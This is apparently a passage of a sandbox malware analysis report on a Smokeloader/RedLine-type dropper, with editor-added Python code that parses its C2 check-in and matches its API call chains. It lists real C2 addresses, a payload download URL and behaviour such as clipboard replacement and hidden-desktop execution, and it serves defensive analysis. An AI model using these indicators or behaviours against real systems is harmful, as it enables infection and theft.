                      ------IJKFHDBKFCAAECBFIDHJ
                      Content-Disposition: form-data; name="build"

                      551488411
                      ------IJKFHDBKFCAAECBFIDHJ--
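The POST above is the first check-in the dropped payload sends to 92.255.57.88: a multipart/form-data body carrying only an `hwid` and a `build` field. The following is an added example, written for this edit and not code from the Joe Sandbox report or from the sample, that decodes that body with a minimal RFC 7578 multipart parser and applies a field-shape check. The request bytes are transcribed from the Data Raw dump above; the `is_stealc_checkin` heuristic is an assumption generalised from this single capture, not a published description of the C2 protocol.

```python
"""Decode the multipart/form-data check-in captured in this report.

Added example, not code from the Joe Sandbox report or from the sample. The request
bytes below are transcribed from the report's Data Raw dump; is_stealc_checkin() is a
heuristic generalised from this single capture (an assumption, not a format spec).
"""
import re

# Headers and body exactly as captured (the report shows Content-Length: 216).
CONTENT_TYPE = "multipart/form-data; boundary=----IJKFHDBKFCAAECBFIDHJ"
CAPTURED_BODY = (
    b"------IJKFHDBKFCAAECBFIDHJ\r\n"
    b'Content-Disposition: form-data; name="hwid"\r\n'
    b"\r\n"
    b"102FC16529061437788654\r\n"
    b"------IJKFHDBKFCAAECBFIDHJ\r\n"
    b'Content-Disposition: form-data; name="build"\r\n'
    b"\r\n"
    b"551488411\r\n"
    b"------IJKFHDBKFCAAECBFIDHJ--\r\n"
)


def boundary_from_content_type(content_type: str) -> str:
    """Return the boundary parameter of a multipart Content-Type header."""
    match = re.search(r'boundary="?([^";]+)"?', content_type)
    if match is None:
        raise ValueError("Content-Type carries no boundary parameter")
    return match.group(1)


def parse_multipart(body: bytes, boundary: str) -> dict:
    """Split an RFC 7578 multipart/form-data body into {field name: raw value bytes}.

    Each part is '--boundary CRLF headers CRLF CRLF value CRLF'; the final
    delimiter is followed by '--'. Parts without a name= parameter are skipped.
    """
    delimiter = b"--" + boundary.encode("ascii")
    fields = {}
    for part in body.split(delimiter):
        if part.startswith(b"\r\n"):
            part = part[2:]
        if part.endswith(b"\r\n"):
            part = part[:-2]
        if not part or part == b"--":          # preamble, or the closing '--'
            continue
        headers, sep, value = part.partition(b"\r\n\r\n")
        if not sep:                             # malformed part: no header terminator
            continue
        name = re.search(rb'name="([^"]*)"', headers)
        if name:
            fields[name.group(1).decode("ascii", "replace")] = value
    return fields


def is_stealc_checkin(fields: dict) -> bool:
    """Heuristic (assumption): exactly two form fields, an alphanumeric 'hwid' and a
    decimal 'build', matching the shape of the captured request."""
    if set(fields) != {"hwid", "build"}:
        return False
    hwid_ok = re.fullmatch(rb"[0-9A-Za-z]{8,64}", fields["hwid"]) is not None
    return hwid_ok and fields["build"].isdigit()


def decode_captured() -> dict:
    """Parse the captured request and return its fields as text."""
    boundary = boundary_from_content_type(CONTENT_TYPE)
    return {k: v.decode("ascii") for k, v in parse_multipart(CAPTURED_BODY, boundary).items()}


if __name__ == "__main__":
    fields = parse_multipart(CAPTURED_BODY, boundary_from_content_type(CONTENT_TYPE))
    for name, value in fields.items():
        print(f"{name} = {value.decode('ascii')}")
    print("matches check-in shape:", is_stealc_checkin(fields))
```

Splitting on the delimiter rather than on `\r\n` alone keeps the parser correct when a field value itself contains line breaks; the boundary is taken from the Content-Type header, as a proxy or IDS would have to do, rather than hard-coded.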
                  Source: 6X4BIzTTBR.exe, 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeh51rtjrk4e8rerSOFTWARE
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.4064235337.0000000002CAE000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000002.4091875835.0000000002CB0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exekm
                  Source: ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp, ED60.tmp.exe, 00000001.00000002.2250290445.0000000002D8A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.php
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpK
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpM
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpb
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/7bbacc20a3bd2eb5.phpf
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/System32
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/_
                  Source: ED60.tmp.exe, 00000001.00000002.2250290445.0000000002DBD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88/t
                  Source: ED60.tmp.exe, 00000001.00000002.2250227394.0000000002D5E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://92.255.57.88BR
                  Source: Amcache.hve.7.dr | String found in binary or memory: http://upx.sf.net
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/
                  Source: 6X4BIzTTBR.exe | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4091808818.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp, 6X4BIzTTBR.exe, 00000000.00000003.4064316717.0000000002C7C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEH
                  Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                  Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                  Source: unknown | HTTPS traffic detected: 172.67.179.207:443 -> 192.168.2.4:49730 version: TLS 1.2
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046D1946 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_00409770 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop
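The "Code function" entries in this report (the download-to-%TEMP%-and-ShellExecute chain at 0_2_00402A05 above, the Sleep-bracketed OpenClipboard/GetClipboardData/EmptyClipboard/SetClipboardData loop at 0_2_004016E3 and 0_2_046D1946, and the CreateDesktopA/CreateProcessA/CloseDesktop chain at 1_2_00409770) are flat call lists. The following is an added example, written for this edit and not code from the Joe Sandbox report or from the sample, that parses those strings and matches them against ordered API subsequences. The three chains are copied from the report; the `PATTERNS` table is the editor's own grouping of the observed calls and is an assumption about what each function implements, not a Joe Sandbox signature definition.

```python
"""Match the API call chains listed in this report against behaviour patterns.

Added example, not code from the Joe Sandbox report or from the sample. The three
chains below are copied from the report's "Code function" entries; PATTERNS is the
editor's own grouping of those calls into ordered subsequences (an assumption).
"""

# "Code function" strings as printed in the report (leading id, comma-separated calls,
# id repeated at the end).
REPORTED_CHAINS = [
    "0_2_00402A05 InternetOpenW,InternetOpenUrlW,GetTempPathW,GetTempFileNameW,CreateFileW,"
    "InternetReadFile,WriteFile,CloseHandle,CloseHandle,ShellExecuteExW,WaitForSingleObject,"
    "CloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00402A05",
    "0_2_046D1946 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,"
    "EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,"
    "0_2_046D1946",
    "1_2_00409770 memset,memset,lstrcatA,lstrcatA,lstrcatA,memset,wsprintfA,OpenDesktopA,"
    "CreateDesktopA,memset,lstrcatA,lstrcatA,lstrcatA,memset,SHGetFolderPathA,lstrcpy,StrStrA,"
    "lstrcpyn,lstrlenA,wsprintfA,lstrcpy,memset,CreateProcessA,Sleep,CloseDesktop,1_2_00409770",
]

# Ordered subsequences (gaps allowed) that characterise a behaviour. Editor's assumption.
PATTERNS = {
    "download_to_temp_and_execute": [
        "InternetOpenUrlW", "GetTempFileNameW", "CreateFileW",
        "InternetReadFile", "WriteFile", "ShellExecuteExW",
    ],
    "clipboard_read_then_replace": [
        "OpenClipboard", "GetClipboardData", "EmptyClipboard",
        "SetClipboardData", "CloseClipboard",
    ],
    "process_on_hidden_desktop": ["CreateDesktopA", "CreateProcessA", "CloseDesktop"],
}


def parse_call_chain(text: str):
    """Return (function id, [api calls]) from a report 'Code function' string.

    The report prints the function id before the first call and repeats it after the
    last one; both copies are removed from the call list.
    """
    tokens = [t.strip() for t in text.split(",") if t.strip()]
    func_id, _, first_call = tokens[0].partition(" ")
    calls = [first_call] + tokens[1:]
    if calls and calls[-1] == func_id:
        calls.pop()
    return func_id, calls


def is_ordered_subsequence(pattern, calls) -> bool:
    """True if every name in pattern occurs in calls in that order, gaps allowed."""
    position = 0
    for call in calls:
        if position < len(pattern) and call == pattern[position]:
            position += 1
    return position == len(pattern)


def match_patterns(calls):
    """Names of all PATTERNS whose call order is present in calls (sorted)."""
    return sorted(name for name, seq in PATTERNS.items() if is_ordered_subsequence(seq, calls))


def classify_reported():
    """Map each reported function id to the behaviours its call chain matches."""
    result = {}
    for text in REPORTED_CHAINS:
        func_id, calls = parse_call_chain(text)
        result[func_id] = match_patterns(calls)
    return result


if __name__ == "__main__":
    for func_id, names in classify_reported().items():
        print(func_id, "->", ", ".join(names) or "no pattern")
```

Ordered-subsequence matching, rather than exact adjacency, is what makes the clipboard pattern hit both variants of the loop in the report (the 0_2_004016E3 copy interleaves GlobalLock calls that the 0_2_046D1946 copy lacks); the same approach carries over to API traces from a debugger or hooking framework, where unrelated calls sit between the ones of interest.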

                  System Summary

                  Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                  Source: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046D2612 NtdllDefWindowProc_W,PostQuitMessage
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046D236E NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code functions: 0_2_00428032, 0_2_004071C1, 0_2_004373E9, 0_2_0042D4FE, 0_2_00427494, 0_2_00428570, 0_2_004166BF, 0_2_00413735, 0_2_00427806, 0_2_0040E98A, 0_2_0042EAF0, 0_2_00427AB0, 0_2_00418ABF, 0_2_00436CCF, 0_2_00427D77, 0_2_00413F1B, 0_2_046F76FB, 0_2_046FD765, 0_2_046F87D7, 0_2_046FED57, 0_2_046E4182, 0_2_046F8299, 0_2_046E8D26, 0_2_046F7D17, 0_2_04706F36, 0_2_046F7FDE, 0_2_046E6926, 0_2_046E399C, 0_2_046F7A6D, 0_2_046DEBF1
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C94D27
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: String function: 046E0997 appears 52 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: String function: 00410730 appears 52 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: String function: 0040F919 appears 36 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: String function: 0040FDC8 appears 123 times
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: String function: 046E002F appears 119 times
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: String function: 00404A60 appears 317 times
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288
                  Source: 6X4BIzTTBR.exe | Binary or memory string: OriginalFileName vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe, 00000000.00000003.1762460911.0000000004780000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameScreenshoter.exeF vs 6X4BIzTTBR.exe
                  Source: 6X4BIzTTBR.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 00000001.00000002.2250158335.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000001.00000002.2250272597.0000000002D6C000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                  Source: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                  Source: 6X4BIzTTBR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: ED60.tmp.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: classification engine | Classification label: mal100.troj.evad.winEXE@4/7@1/3
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C0E17E CreateToolhelp32Snapshot,Module32First
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C8CF29 CoCreateInstance,MultiByteToWideChar,lstrcpyn
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htm
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Mutant created: \Sessions\1\BaseNamedObjects\h51rtjrk4e8rer
                  Source: C:\Windows\SysWOW64\WerFault.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7532
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File created: C:\Users\user\AppData\Local\Temp\ED60.tmp
                  Source: 6X4BIzTTBR.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: 6X4BIzTTBR.exe | ReversingLabs: Detection: 34%
                  Source: unknown | Process created: C:\Users\user\Desktop\6X4BIzTTBR.exe "C:\Users\user\Desktop\6X4BIzTTBR.exe"
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Process created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe "C:\Users\user\AppData\Local\Temp\ED60.tmp.exe"
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7532 -s 1288
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Sections loaded (in order): apphelp.dll, msimg32.dll, wininet.dll, msvcr100.dll, iertutil.dll, sspicli.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, iphlpapi.dll, mswsock.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, dnsapi.dll, rasadhlp.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, ntasn1.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncrypt.dll, ncryptsslp.dll, uxtheme.dll, propsys.dll, windows.staterepositoryps.dll, edputil.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, pcacli.dll, mpr.dll, sfc_os.dll
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Sections loaded (in order): apphelp.dll, msimg32.dll, msvcr100.dll, sspicli.dll, wininet.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, iertutil.dll, windows.storage.dll, wldp.dll, profapi.dll, kernel.appcore.dll, ondemandconnroutehelper.dll, winhttp.dll, mswsock.dll, iphlpapi.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll

                  Data Obfuscation

                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Unpacked PE file: 0.2.6X4BIzTTBR.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xarocuz:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Unpacked PE file: 1.2.ED60.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.xuxoz:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Unpacked PE file: 0.2.6X4BIzTTBR.exe.400000.0.unpack
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Unpacked PE file: 1.2.ED60.tmp.exe.400000.0.unpack
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_0041EC6E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                  Source: 6X4BIzTTBR.exe | Static PE information: section name: .xarocuz
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .xuxoz
                  Source: ED60.tmp.exe.0.dr | Static PE information: section name: .xuxoz
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_00410776 push ecx; ret 0_2_00410789
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_0043DB87 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB8B
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_0040FDA2 push ecx; ret 0_2_0040FDB5
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C0F209 push ebx; retf 0_2_02C0F213
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C13375 pushad ; ret 0_2_02C13391
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C134F2 push ecx; ret 0_2_02C1350F
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C108EB pushad ; ret 0_2_02C108ED
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C0D805 pushad ; retf 0_2_02C0D80D
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_02C10D68 push 00000003h; ret 0_2_02C10D6C
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046E0009 push ecx; ret 0_2_046E001C
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_04709DF8 pushad ; retf 0_2_04709DFF
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_04707FAD push esp; retf 0_2_04707FAE
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_046E09DD push ecx; ret 0_2_046E09F0
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_047079AF push esp; retf 0_2_047079B7
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02C97D0C push ecx; ret 1_2_02C97D1F
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02D70276 pushad ; iretd 1_2_02D70277
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02D728EE push ebx; iretd 1_2_02D72908
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02D6F192 push 00000032h; retf 1_2_02D6F194
                  Source: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe | Code function: 1_2_02D6E177 push ebx; ret 1_2_02D6E1F4
                  Source: 6X4BIzTTBR.exe | Static PE information: section name: .text entropy: 7.550335465117481
                  Source: ScreenUpdateSync[1].exe.0.dr | Static PE information: section name: .text entropy: 7.117299996863085
                  Source: ED60.tmp.exe.0.dr | Static PE information: section name: .text entropy: 7.117299996863085
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exe
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | File created: C:\Users\user\AppData\Local\Temp\ED60.tmp.exe
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Code function: 0_2_0040E98A GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                  Source: C:\Users\user\Desktop\6X4BIzTTBR.exe | Process information set: NOOPENFILEERRORBOX (reported 2 times)
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX (reported 3 times)
                  Source: C:\Windows\SysWOW64\WerFault.exe | Process information set: NOOPENFILEERRORBOX (reported 3 times)
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
